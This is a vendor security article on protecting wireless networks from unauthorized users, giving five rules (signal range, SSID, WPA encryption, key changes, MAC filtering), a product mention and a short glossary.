Home Page | Skip to Navigation | Skip to Content | Skip to Search | Skip to Footer
  Café Links
Security Café Home
 

Reading Room
More Than Passwords: Five Rules to Ward off Wireless Pests

ollege students do it. Coffee shop customers do it, too. Your neighbors in the business park are probably doing it right now.

Many computer users search for an available wireless network to tap into—whether at the mall, at school, home, or work—and whether they have permission to use that network or not. Knowingly or unknowingly, these wireless parasites may be doing more than swiping a signal. When they connect, they can open up your network—and all the computers on it—to an array of security breaches.

Authorized access, two times the hacking
One 2006 survey found that roughly 36 percent of businesses allow some staff to access their systems from a remote location, e.g. from home or via wireless hot spots. Four-fifths of large businesses allow this. Interestingly, respondents who allow remote access are twice as likely to have had an unauthorized outsider try to break into their network as those who do not. Also, they are more likely to have experienced an actual penetration incident.

These problems are compounded when someone allowed to use an organization's wireless network adds an unauthorized wireless signal to increase the main network's signal strength. These unauthorized access points are especially vulnerable, often unprotected by any security measures that may exist on the main network.

Passwords do not pass muster
At home, people usually use passwords to protect their wireless networks from unauthorized access. And passwords are still the main way of authorizing users on business networks. But passwords are woefully inadequate for remote and mobile computer users—particularly for wireless.

Unsecured wireless access points pose problems for businesses and other organizations that make wireless access available. Unsecured connections are an open invitation to hackers.

Now, a study by the University of Maryland (UM) seems to confirm this, indicating that passwords alone may not provide enough protection for wireless networks. And they are particularly inadequate for the wireless networks of larger organizations.

For many organizations and sites, thousands of users legitimately access widespread wireless networks at any given time. But in turn, some of these users set up their own wireless networks—linked to the official network—to increase the signal in their offices or homes. This is what computer experts call an unmanaged wireless access point.

"If these secondary connections are not secure, they open up the entire network to trouble," says Michel Cukier, assistant professor in the UM reliability engineering program. "Unsecured wireless access points pose problems for businesses, cities, and other organizations that make wireless access available to customers, employees, and residents. Unsecured connections are an open invitation to hackers seeking access to vulnerable computers."

Five rules
It is recommended that wireless network owners and administrators take precautions to better secure wireless networks from parasites trolling for access and unsecured connections set up by legitimate users for each of the following:

  1. Signal coverage

    2. Limit the strength of your wireless network so that it cannot be detected outside the bounds of your office.

  2. SSID broadcasting

    3. A Service Set IDentifier (SSID) is a code attached to packets on a wireless network that is used to identify each packet as part of that network. When SSID broadcasting is enabled on a wireless network, it can be identified by all wireless clients within range. Conversely, when SSID broadcasting is disabled, the wireless network is not visible—to casual users—unless this code is entered in advance into the client's network setting. If you have remote wireless LANs, ensure that the SSID is changed from the default and is secured to prevent unauthorized wireless users from connecting. Do not change it to something obvious like your company name.

  3. WPA/WEP encryption

    4. Encrypted communication will protect confidential information from being disclosed. If the traffic over your wireless network is encrypted, an attacker must decrypt the password before retrieving information transmitted over the network. There are two encryption schemes available: Wi-Fi Protected Access (WPA) and Wired Equivalent Privacy (WEP). In practice, only one of them can be used at a time. Regularly changing the encryption key may also help to protect your network.

    Whenever possible, WPA should be used because WEP can be decrypted by hackers equipped with special software. In any event, do not use WEP for encryption just because it is poor, unsecure, and weak. Use WPA or WPA2—also known as 802.11i—and ensure that users always operate with it switched on—the default is with it switched off.

  4. Key management

    5. Even if encryption is used, if the key to this encryption—generated by the network—is not changed often, a hacker might crack it and decrypt the communication. Therefore, the key must be changed regularly.

  5. MAC addresses

    6. Another security option is to implement media access control (MAC) filtering. A MAC address—essentially a serial number unique to each manufactured network adapter—is a physical address, so if you restrict access to devices whose addresses you have authorized, you can eliminate many unauthorized wireless access issues. If a wireless access point only accepts connections from known MAC addresses, a potential attacker will need to learn the addresses of legitimate computers in order to access the wireless network.

    The Check Point approach
    Check Point UTM-1 Edge wireless access appliances support security policies utilizing multiple SSIDs, WPA, WPA2, and MAC address filtering. Other security measures such as IPSec over WLAN and RADIUS are also supported.

Wireless Security Glossary

Key
Information needed to "unlock" encrypted information.

MAC address
A number that acts like a name for a particular network adapter such as a network card or wireless adapter.

Packets
When information is transmitted from one computer to another, it is often broken up into packets, which can be transmitted faster. These packets are then pieced back together once received.

Service Set IDentifier (SSID)
A code attached to all packets on a wireless network to identify each as part of that network.

Wi-Fi Protected Access (WPA)
Security systems created to make up for deficiencies in Wired Equivalent Privacy (WEP) schemes.

Wired Equivalent Privacy (WEP)
Security protocol originally developed to protect wireless networks because such networks broadcast messages using radio and, therefore, are susceptible to eavesdropping.